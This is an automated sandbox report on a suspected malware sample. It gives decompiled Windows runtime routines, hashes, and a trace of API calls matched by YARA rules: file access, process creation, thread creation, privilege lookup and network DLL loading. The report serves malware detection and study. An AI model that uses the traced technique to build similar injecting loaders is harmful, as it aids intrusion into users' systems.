                                                • Instruction ID: 34a331877e6935b1f84647ee9600a8807eb2a515549d6a15d48567cc22dc07bc
                                                • Opcode Fuzzy Hash: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                • Instruction Fuzzy Hash: DB511B727542056FEB14CB19CC81FA633ADAFD8711F21C229FD59DB286E971EC418790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E009514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                				signed int _v8;
                                                				char _v10;
                                                				char _v140;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t24;
                                                				void* _t26;
                                                				signed int _t29;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				intOrPtr _t45;
                                                				void* _t51;
                                                				intOrPtr* _t52;
                                                				void* _t54;
                                                				signed int _t57;
                                                				void* _t58;
                                                
                                                				_t51 = __edx;
                                                				_t24 =  *0x9f2088; // 0x77e481ab
                                                				_v8 = _t24 ^ _t57;
                                                				_t45 = _a16;
                                                				_t53 = _a4;
                                                				_t52 = _a20;
                                                				if(_a4 == 0 || _t52 == 0) {
                                                					L10:
                                                					_t26 = 0xc000000d;
                                                				} else {
                                                					if(_t45 == 0) {
                                                						if( *_t52 == _t45) {
                                                							goto L3;
                                                						} else {
                                                							goto L10;
                                                						}
                                                					} else {
                                                						L3:
                                                						_t28 =  &_v140;
                                                						if(_a12 != 0) {
                                                							_push("[");
                                                							_push(0x41);
                                                							_push( &_v140);
                                                							_t29 = E00947707();
                                                							_t58 = _t58 + 0xc;
                                                							_t28 = _t57 + _t29 * 2 - 0x88;
                                                						}
                                                						_t54 = E009513CB(_t53, _t28);
                                                						if(_a8 != 0) {
                                                							_t34 = E00947707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t34 * 2;
                                                						}
                                                						if(_a12 != 0) {
                                                							_t40 = E00947707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t40 * 2;
                                                						}
                                                						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                						 *_t52 = _t53;
                                                						if( *_t52 < _t53) {
                                                							goto L10;
                                                						} else {
                                                							E00912340(_t45,  &_v140, _t53 + _t53);
                                                							_t26 = 0;
                                                						}
                                                					}
                                                				}
                                                				return E0091E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                			}





















                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0097EA22
                                                  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
                                                  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 00951490
                                                • ___swprintf_l.LIBCMT ref: 0095156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                • Instruction ID: 89db2ac7ae0434728841614becbdb4821c7fbb1c5351cb5bb8c3ac0fca1ce611
                                                • Opcode Fuzzy Hash: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                • Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E009353A5(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t37;
                                                				signed int _t40;
                                                				signed int _t42;
                                                				void* _t45;
                                                				intOrPtr _t46;
                                                				signed int _t49;
                                                				void* _t51;
                                                				signed int _t57;
                                                				signed int _t64;
                                                				signed int _t71;
                                                				void* _t74;
                                                				intOrPtr _t78;
                                                				signed int* _t79;
                                                				void* _t85;
                                                				signed int _t86;
                                                				signed int _t92;
                                                				void* _t104;
                                                				void* _t105;
                                                
                                                				_t64 = _a4;
                                                				_t32 =  *(_t64 + 0x28);
                                                				_t71 = _t64 + 0x28;
                                                				_push(_t92);
                                                				if(_t32 < 0) {
                                                					_t78 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                						goto L3;
                                                					} else {
                                                						__eflags = _t32 | 0xffffffff;
                                                						asm("lock xadd [ecx], eax");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L3:
                                                					_push(_t86);
                                                					while(1) {
                                                						L4:
                                                						__eflags = _t32;
                                                						if(_t32 == 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                							_t79 = _t64 + 0x24;
                                                							_t71 = 1;
                                                							asm("lock xadd [eax], ecx");
                                                							_t32 =  *(_t64 + 0x28);
                                                							_a4 = _t32;
                                                							__eflags = _t32;
                                                							if(_t32 != 0) {
                                                								L19:
                                                								_t86 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009f01c0;
                                                									_push(_t92);
                                                									_push(0);
                                                									_t37 = E0090F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                									__eflags = _t37 - 0x102;
                                                									if(_t37 != 0x102) {
                                                										break;
                                                									}
                                                									_t71 =  *(_t92 + 4);
                                                									_t85 =  *_t92;
                                                									_t51 = L00954FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                									_push(_t85);
                                                									_push(_t51);
                                                									L00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                									L00963F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                									_t86 = _t86 + 1;
                                                									_t105 = _t104 + 0x28;
                                                									__eflags = _t86 - 2;
                                                									if(__eflags > 0) {
                                                										E0099217A(_t71, __eflags, _t64);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									L00963F92();
                                                									_t104 = _t105 + 0xc;
                                                								}
                                                								__eflags = _t37;
                                                								if(__eflags < 0) {
                                                									_push(_t37);
                                                									E00953915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                									asm("int3");
                                                									_t40 =  *_t71;
                                                									 *_t71 = 0;
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L1:
                                                										_t42 = E00935384(_t92 + 0x24);
                                                										if(_t42 != 0) {
                                                											goto L31;
                                                										} else {
                                                											goto L2;
                                                										}
                                                									} else {
                                                										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                										_push( &_a4);
                                                										_push(_t40);
                                                										_t49 = E0090F970( *((intOrPtr*)(_t92 + 0x18)));
                                                										__eflags = _t49;
                                                										if(__eflags >= 0) {
                                                											goto L1;
                                                										} else {
                                                											_push(_t49);
                                                											E00953915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                											L31:
                                                											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                											_push( &_a4);
                                                											_push(1);
                                                											_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
                                                											__eflags = _t42;
                                                											if(__eflags >= 0) {
                                                												L2:
                                                												return _t42;
                                                											} else {
                                                												_push(_t42);
                                                												E00953915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                												_push( &_a4);
                                                												_push(1);
                                                												_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
                                                												__eflags = _t42;
                                                												if(__eflags >= 0) {
                                                													goto L2;
                                                												} else {
                                                													_push(_t42);
                                                													_t45 = E00953915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                													asm("int3");
                                                													while(1) {
                                                														_t74 = _t45;
                                                														__eflags = _t45 - 1;
                                                														if(_t45 != 1) {
                                                															break;
                                                														}
                                                														_t86 = _t86 | 0xffffffff;
                                                														_t45 = _t74;
                                                														asm("lock cmpxchg [ebx], edi");
                                                														__eflags = _t45 - _t74;
                                                														if(_t45 != _t74) {
                                                															continue;
                                                														} else {
                                                															_t46 =  *[fs:0x18];
                                                															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                															return _t46;
                                                														}
                                                														goto L37;
                                                													}
                                                													E00935329(_t74, _t92);
                                                													_push(1);
                                                													return E009353A5(_t92);
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									_t32 =  *(_t64 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t71 =  *_t79;
                                                								__eflags = _t71;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t57 = _t71;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t57 - _t71;
                                                										if(_t57 == _t71) {
                                                											break;
                                                										}
                                                										_t71 = _t57;
                                                										__eflags = _t57;
                                                										if(_t57 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									_t32 = _a4;
                                                									__eflags = _t71;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L19;
                                                								}
                                                							}
                                                						}
                                                						goto L37;
                                                					}
                                                					_t71 = _t71 | 0xffffffff;
                                                					_t32 = 0;
                                                					asm("lock cmpxchg [edx], ecx");
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L4;
                                                					} else {
                                                						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                						return 1;
                                                					}
                                                				}
                                                				L37:
                                                			}


                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
                                                • RTL: Re-Waiting, xrefs: 00972328
                                                • RTL: Resource at %p, xrefs: 0097230B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                • Instruction ID: 8357857640b4f4155905fd00884eb2c2839117ec6aad3d23648b0fec3cd8ac04
                                                • Opcode Fuzzy Hash: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                • Instruction Fuzzy Hash: 5B510872700705ABDB15DB29CC81FA6739CEF98764F118229FD18DB281E661ED418B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: c5c6ff21687514e1d96d00d2caf9acf8297ec8c698c99a0c8ac3dff7d0cc2a40
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: A2919172D0021AEFDF24CF59C855AAFB7B8FF55309F24847AD445A72A2E7304A41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000985FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 1de84a8c26ebc7edd3a087416065dc0c436bebed3768d0cfcb9c803ae6bcc167
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: E5F0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000986A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: !:
                                                • API String ID: 2738559852-2595984152
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 42a30f2ef5156c0618ecd3b7f0fe7c448ee075f7671ce12c6632b566645b51a6
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: EDF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97255DA30E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: @=
                                                • API String ID: 3535843008-2632950984
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: f87540569f30c08a7b2809185a3ce9d153d9c9dab6d2862f9557835a10c29ec1
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: EED01776200214ABDB10EB99CC89EE77BADEF48760F154499BA189B242C930FA0086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00097378
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00097378
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000988ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872DA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872FB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 88f562c184ae37d093af23ba06a366c5bb95a27bdb7d34895bc7096f1526536c
                                                • Instruction ID: 76137ffd9ee375fd82fb3786031b09c5070340f9f32425ac97783d936eb0b4c9
                                                • Opcode Fuzzy Hash: 88f562c184ae37d093af23ba06a366c5bb95a27bdb7d34895bc7096f1526536c
                                                • Instruction Fuzzy Hash: C301A731A8022877EB21B6949C03FFE776C6B01F50F140114FF04BA1C2EA946A0547F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BA2
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                • Instruction ID: 0a12588c27eefc104df6827deb66a12df96b9a8d24a78904b543997f715d5111
                                                • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                • Instruction Fuzzy Hash: 820112B5D0010DBBDF10EAE4ED42FEDB7B8AB54704F044195A90897142F671EB14D791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098984
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 71d1dda26f9bf239f3b30ba390ba55d7db564bf65d52b519873bfa10559fca1b
                                                • Instruction ID: 0336a58dfeeaeb8725eb0a32f8cdc94570be2f3f0a4ec5426f75f30a101ef857
                                                • Opcode Fuzzy Hash: 71d1dda26f9bf239f3b30ba390ba55d7db564bf65d52b519873bfa10559fca1b
                                                • Instruction Fuzzy Hash: ED01AFB2200108ABCB54CF89DD81EEB37AAAF8C354F158248FA0DE7255C630E851CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098984
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 1fd74cbbb40c3e4ab12df46f30a16c429b8e682a02be56e035a93056b8f56152
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 2301AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97255C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009743C
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 51ba582e3e911b42fa11c135c165df8541740ea8ef473cff33f2ac28b774aa9f
                                                • Instruction ID: e030025f74a00630b08b58f9cebff5fdcf4642e4edde9a9282239687f491b349
                                                • Opcode Fuzzy Hash: 51ba582e3e911b42fa11c135c165df8541740ea8ef473cff33f2ac28b774aa9f
                                                • Instruction Fuzzy Hash: 94E06D333902043AE62065999C02FE7B29C8B81B20F150026FA0DEA2C2D995F80152A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098A50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: ed37df251b98d60559eec580bf9713a21e71f203d7ee3a02d4262ca61647fb4a
                                                • Instruction ID: bfc525a52e53d967fef5a378d6de4c389f651f837a4cd16ce8e85acbdb7d6f26
                                                • Opcode Fuzzy Hash: ed37df251b98d60559eec580bf9713a21e71f203d7ee3a02d4262ca61647fb4a
                                                • Instruction Fuzzy Hash: 5AE01AB16002046BDB10DF99DC84FE737AAAF88350F118155BA0DAB251CA35E815CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098A50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 3d8cdf87c30b84d8b2e42dccf3f8830cb3c29f3efff65a99d061561c6976c6e6
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 1EE01AB12002086BDB10DF49CC85EE737ADAF88650F018154BA0857242C930E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D44B
                                                Memory Dump Source
